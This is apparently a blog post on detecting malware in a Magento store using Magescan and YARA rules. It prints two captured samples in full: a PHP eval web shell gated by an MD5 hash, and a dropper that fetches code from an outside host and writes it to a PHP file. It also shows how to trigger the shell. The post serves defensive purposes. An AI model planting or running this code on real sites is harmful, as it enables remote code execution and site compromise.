Finding Malicious Code on Magento

The first thing to do is check your site from an outside perspective, as any other black hatter would do.

The Frontend scan

Use Magescan: ./magescan scan:all <site>

This scan will usually tell you what patches will be applied. First thing to do would be to patch them immediately.

Next thing is to check if there are any known modules that are vulnerable under Installed Modules. A classic problem extension is:


+------------------------+-----------+
| Module                 | Installed |
+------------------------+-----------+
| VladimirPopov_WebForms | Yes       |
+------------------------+-----------+

This extension allows users to upload anything they want onto your server including files with the extension .php

So get rid of that thing as soon as you  can.

A server side scan

Now time to scan for vulnerabilities and remote execution that are already a part of your magento site.

The best thing to use would be a Magento malware collection

The command to run is yara -r rules/all-confirmed.yar /path/to/directory

It will check against known MD5 hashes for files and for eval expressions:


eval_post My-site/magento/media/dhl/info.php
md5_c647e85ad77fd9971ba709a08566935d My-site/magento/media/wysiwyg/12345.php

The contents of info.php is:


$hash = 'fc5e038d38a57032085441e7fe7010b0';
if(isset($_POST['ue'])){
    if (md5($_POST['hash']) === $hash) @eval(base64_decode($_POST['ue']));
    exit;
}
if(isset($_GET['sesion'])){
    phpinfo();
}

The contents of 12345.php is:


$cmd1 = file_get_contents("http://seotramp.com/wp-content/plugins/youtuber/cache.txt");
$fo = fopen("cache.php", "w+");
fwrite($fo, $cmd1);
fclose($fo);

I am not too sure about the second one, as that is more of a redirect hack that sends you and maybe your users to a Be Rich now if you use the Binary Options System

The first one is remote execution where you encode your code base64 and add a hash. I think they add all of these extra things just to confuse developers into thinking there is nothing going on here.

So to try it out we can make a post to: media/dhl/info.php

With

$_POST[‘ue’] = ZWNobyAnaGVsbG8gd29ybGQnOw==

and

$_POST[‘hash’] = helloworld

ZWNobyAnaGVsbG8gd29ybGQnOw==, base64 decoded is echo hello world;

So that is remote execution

 

Leave a Comment

Your email address will not be published. Required fields are marked *